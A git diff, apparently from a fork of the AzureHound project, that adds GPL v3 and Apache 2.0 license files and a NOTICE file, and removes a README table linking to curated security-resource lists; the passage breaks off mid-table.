verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + +You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + +5. Conveying Modified Source Versions. + +You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + +a) The work must carry prominent notices stating that you modified +it, and giving a relevant date. + +b) The work must carry prominent notices stating that it is +released under this License and any conditions added under section +7. This requirement modifies the requirement in section 4 to +"keep intact all notices". + +c) You must license the entire work, as a whole, under this +License to anyone who comes into possession of a copy. This +License will therefore apply, along with any applicable section 7 +additional terms, to the whole of the work, and all its parts, +regardless of how they are packaged. This License gives no +permission to license the work in any other way, but it does not +invalidate such permission if you have separately received it. + +d) If the work has interactive user interfaces, each must display +Appropriate Legal Notices; however, if the Program has interactive +interfaces that do not display Appropriate Legal Notices, your +work need not make them do so. + +A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + +6. Conveying Non-Source Forms. + +You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + +a) Convey the object code in, or embodied in, a physical product +(including a physical distribution medium), accompanied by the +Corresponding Source fixed on a durable physical medium +customarily used for software interchange. + +b) Convey the object code in, or embodied in, a physical product +(including a physical distribution medium), accompanied by a +written offer, valid for at least three years and valid for as +long as you offer spare parts or customer support for that product +model, to give anyone who possesses the object code either (1) a +copy of the Corresponding Source for all the software in the +product that is covered by this License, on a durable physical +medium customarily used for software interchange, for a price no +more than your reasonable cost of physically performing this +conveying of source, or (2) access to copy the +Corresponding Source from a network server at no charge. + +c) Convey individual copies of the object code with a copy of the +written offer to provide the Corresponding Source. This +alternative is allowed only occasionally and noncommercially, and +only if you received the object code with such an offer, in accord +with subsection 6b. + +d) Convey the object code by offering access from a designated +place (gratis or for a charge), and offer equivalent access to the +Corresponding Source in the same way through the same place at no +further charge. You need not require recipients to copy the +Corresponding Source along with the object code. If the place to +copy the object code is a network server, the Corresponding Source +may be on a different server (operated by you or a third party) +that supports equivalent copying facilities, provided you maintain +clear directions next to the object code saying where to find the +Corresponding Source. Regardless of what server hosts the +Corresponding Source, you remain obligated to ensure that it is +available for as long as needed to satisfy these requirements. + +e) Convey the object code using peer-to-peer transmission, provided +you inform other peers where the object code and Corresponding +Source of the work are being offered to the general public at no +charge under subsection 6d. + +A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + +A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + +"Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + +If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + +The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + +Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + +7. Additional Terms. + +"Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + +When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + +Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + +a) Disclaiming warranty or limiting liability differently from the +terms of sections 15 and 16 of this License; or + +b) Requiring preservation of specified reasonable legal notices or +author attributions in that material or in the Appropriate Legal +Notices displayed by works containing it; or + +c) Prohibiting misrepresentation of the origin of that material, or +requiring that modified versions of such material be marked in +reasonable ways as different from the original version; or + +d) Limiting the use for publicity purposes of names of licensors or +authors of the material; or + +e) Declining to grant rights under trademark law for use of some +trade names, trademarks, or service marks; or + +f) Requiring indemnification of licensors and authors of that +material by anyone who conveys the material (or modified versions of +it) with contractual assumptions of liability to the recipient, for +any liability that these contractual assumptions directly impose on +those licensors and authors. + +All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + +If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + +Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + +8. Termination. + +You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + +However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + +Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + +Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + +9. Acceptance Not Required for Having Copies. + +You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + +10. Automatic Licensing of Downstream Recipients. + +Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + +An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + +You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + +11. Patents. + +A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + +A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + +Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + +In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + +If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + +If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + +A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + +Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + +12. No Surrender of Others' Freedom. + +If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + +13. Use with the GNU Affero General Public License. + +Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + +14. Revised Versions of this License. + +The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + +If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + +Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + +15. Disclaimer of Warranty. + +THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + +16. Limitation of Liability. + +IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + +17. Interpretation of Sections 15 and 16. + +If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + +END OF TERMS AND CONDITIONS + +How to Apply These Terms to Your New Programs + +If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + +To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + +Copyright (C) 2024 Sulaiman A + +This program is free software: you can redistribute it and/or modify +it under the terms of the GNU General Public License as published by +the Free Software Foundation, either version 3 of the License, or +(at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program. If not, see [gnu](http://www.gnu.org/licenses/). + +Also add information on how to contact you by electronic and paper mail. + +If the program does terminal interaction, make it output a short +notice like this when it starts in an interactive mode: + +AzureHoundAD Copyright (C) 2017 - 2024 | byt3n33dl3 ( Sulaiman ) - Leader of GangstaCrew + +This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. +This is free software, and you are welcome to redistribute it +under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, your program's commands +might be different; for a GUI interface, you would use an "about box". + +You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU GPL, see +[gnu](http://www.gnu.org/licenses/). + +The GNU General Public License does not permit incorporating your program +into proprietary programs. If your program is a subroutine library, you +may consider it more useful to permit linking proprietary applications with +the library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. But first, please read +[lgpl](http://www.gnu.org/philosophy/why-not-lgpl.html). diff --git a/LICENSE.txt b/LICENSE.txt new file mode 100644 index 0000000..63c2d21 --- /dev/null +++ b/LICENSE.txt @@ -0,0 +1,201 @@ +Apache License + Version 2.0, January 2004 + www.apache.org/licenses + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "{}" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright 2024 @byt3n33dl3 (Sulaiman A) + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. \ No newline at end of file diff --git a/NOTICE.md b/NOTICE.md new file mode 100644 index 0000000..f94683b --- /dev/null +++ b/NOTICE.md @@ -0,0 +1,15 @@ +Copyright (C) 2024 The @byt3n33dl3 +Copyright (C) 2022 The BloodHound Enterprise Team + +AzureHound is free software: you can redistribute it and/or modify +it under the terms of the GNU General Public License as published by +the Free Software Foundation, either version 3 of the License, or +(at your option) any later version. + +AzureHound is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program. If not, see [www.gnu.org](https://www.gnu.org/licenses/). diff --git a/README.md b/README.md index d685120..1c5d5f5 100644 --- a/README.md +++ b/README.md @@ -1,100 +1,91 @@ -

- -

- -**A collection of awesome lists for hackers, pentesters & security researchers.** - -Your contributions are always welcome ! - -## Awesome Repositories - -Repository | Description ----- | ---- -[Android Security](https://github.com/ashishb/android-security-awesome) | Collection of Android security related resources -[AppSec](https://github.com/paragonie/awesome-appsec) | Resources for learning about application security -[Asset Discovery](https://github.com/redhuntlabs/Awesome-Asset-Discovery) | List of resources which help during asset discovery phase of a security assessment engagement -[Bug Bounty](https://github.com/djadmin/awesome-bug-bounty) | List of Bug Bounty Programs and write-ups from the Bug Bounty hunters -[Capsulecorp Pentest](https://github.com/r3dy/capsulecorp-pentest) | Vagrant+Ansible virtual network penetration testing lab. Companion to "The Art of Network Penetration Testing" by Royce Davis -[CTF](https://github.com/apsdehal/awesome-ctf) | List of CTF frameworks, libraries, resources and softwares -[Cyber Skills](https://github.com/joe-shenouda/awesome-cyber-skills) | Curated list of hacking environments where you can train your cyber skills legally and safely -[DevSecOps](https://github.com/devsecops/awesome-devsecops) | List of awesome DevSecOps tools with the help from community experiments and contributions -[Embedded and IoT Security](https://github.com/fkie-cad/awesome-embedded-and-iot-security) | A curated list of awesome resources about embedded and IoT security -[Exploit Development](https://github.com/FabioBaroni/awesome-exploit-development) | Resources for learning about Exploit Development -[Fuzzing](https://github.com/secfigo/Awesome-Fuzzing) | List of fuzzing resources for learning Fuzzing and initial phases of Exploit Development like root cause analysis -[Hacking](https://github.com/carpedm20/awesome-hacking) | List of awesome Hacking tutorials, tools and resources -[Hacking Resources](https://github.com/vitalysim/Awesome-Hacking-Resources) | Collection of hacking / penetration testing resources to make you better! -[Honeypots](https://github.com/paralax/awesome-honeypots) | List of honeypot resources -[Incident Response](https://github.com/meirwah/awesome-incident-response) | List of tools for incident response -[Industrial Control System Security](https://github.com/hslatman/awesome-industrial-control-system-security) | List of resources related to Industrial Control System (ICS) security -[InfoSec](https://github.com/onlurking/awesome-infosec) | List of awesome infosec courses and training resources -[IoT Hacks](https://github.com/nebgnahz/awesome-iot-hacks) | Collection of Hacks in IoT Space -[Mainframe Hacking](https://github.com/samanL33T/Awesome-Mainframe-Hacking) | List of Awesome Mainframe Hacking/Pentesting Resources -[Malware Analysis](https://github.com/rshipp/awesome-malware-analysis) | List of awesome malware analysis tools and resources -[OSINT](https://github.com/jivoi/awesome-osint) | List of amazingly awesome Open Source Intelligence (OSINT) tools and resources -[OSX and iOS Security](https://github.com/ashishb/osx-and-ios-security-awesome) | OSX and iOS related security tools -[Pcaptools](https://github.com/caesar0301/awesome-pcaptools) | Collection of tools developed by researchers in the Computer Science area to process network traces -[Pentest](https://github.com/enaqx/awesome-pentest) | List of awesome penetration testing resources, tools and other shiny things -[PHP Security](https://github.com/ziadoz/awesome-php#security) | Libraries for generating secure random numbers, encrypting data and scanning for vulnerabilities -[Real-time Communications hacking & pentesting resources](https://github.com/EnableSecurity/awesome-rtc-hacking) | Covers VoIP, WebRTC and VoLTE security related topics -[Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) | List of Awesome Red Team / Red Teaming Resources -[Reversing](https://github.com/fdivrp/awesome-reversing) | List of awesome reverse engineering resources -[Reinforcement Learning for Cyber Security](https://github.com/Limmen/awesome-rl-for-cybersecurity) | List of awesome reinforcement learning for security resources -[Sec Talks](https://github.com/PaulSec/awesome-sec-talks) | List of awesome security talks -[SecLists](https://github.com/danielmiessler/SecLists) | Collection of multiple types of lists used during security assessments -[Security](https://github.com/sbilly/awesome-security) | Collection of awesome software, libraries, documents, books, resources and cools stuffs about security -[Serverless Security](https://github.com/puresec/awesome-serverless-security/) | Collection of Serverless security related resources -[Social Engineering](https://github.com/v2-dev/awesome-social-engineering) | List of awesome social engineering resources -[Static Analysis](https://github.com/mre/awesome-static-analysis) | List of static analysis tools, linters and code quality checkers for various programming languages -[The Art of Hacking Series](https://github.com/The-Art-of-Hacking/h4cker) | List of resources includes thousands of cybersecurity-related references and resources -[Threat Intelligence](https://github.com/hslatman/awesome-threat-intelligence) | List of Awesome Threat Intelligence resources -[Vehicle Security](https://github.com/jaredthecoder/awesome-vehicle-security) | List of resources for learning about vehicle security and car hacking -[Vulnerability Research](https://github.com/re-pronin/awesome-vulnerability-research) | List of resources about Vulnerability Research -[Web Hacking](https://github.com/infoslack/awesome-web-hacking) | List of web application security -[Windows Exploitation - Advanced](https://github.com/yeyintminthuhtut/Awesome-Advanced-Windows-Exploitation-References) | List of Awesome Advanced Windows Exploitation References -[WiFi Arsenal](https://github.com/0x90/wifi-arsenal) | Pack of various useful/useless tools for 802.11 hacking -[YARA](https://github.com/InQuest/awesome-yara) | List of awesome YARA rules, tools, and people -[Hacker Roadmap](https://github.com/sundowndev/hacker-roadmap) | A guide for amateur pen testers and a collection of hacking tools, resources and references to practice ethical hacking. - -## Other Useful Repositories - -Repository | Description ----- | ---- -[Adversarial Machine Learning](https://github.com/yenchenlin/awesome-adversarial-machine-learning) | Curated list of awesome adversarial machine learning resources -[AI Security](https://github.com/RandomAdversary/Awesome-AI-Security) | Curated list of AI security resources -[API Security Checklist](https://github.com/shieldfy/API-Security-Checklist) | Checklist of the most important security countermeasures when designing, testing, and releasing your API -[APT Notes](https://github.com/kbandla/APTnotes) | Various public documents, whitepapers and articles about APT campaigns -[Bug Bounty Reference](https://github.com/ngalongc/bug-bounty-reference) | List of bug bounty write-up that is categorized by the bug nature -[Cryptography](https://github.com/sobolevn/awesome-cryptography) | Cryptography resources and tools -[CTF Tool](https://github.com/SandySekharan/CTF-tool) | List of Capture The Flag (CTF) frameworks, libraries, resources and softwares -[CVE PoC](https://github.com/qazbnm456/awesome-cve-poc) | List of CVE Proof of Concepts (PoCs) -[CVE PoC updated daily](https://github.com/trickest/cve) | List of CVE Proof of Concepts (PoCs) updated daily by Trickest -[Detection Lab](https://github.com/clong/DetectionLab) | Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices -[Forensics](https://github.com/Cugu/awesome-forensics) | List of awesome forensic analysis tools and resources -[Free Programming Books](https://github.com/EbookFoundation/free-programming-books) | Free programming books for developers -[Gray Hacker Resources](https://github.com/bt3gl/Gray-Hacker-Resources) | Useful for CTFs, wargames, pentesting -[GTFOBins](https://gtfobins.github.io) | A curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions -[Hacker101](https://github.com/Hacker0x01/hacker101) | A free class for web security by HackerOne -[Infosec Getting Started](https://github.com/gradiuscypher/infosec_getting_started) | A collection of resources, documentation, links, etc to help people learn about Infosec -[Infosec Reference](https://github.com/rmusser01/Infosec_Reference) | 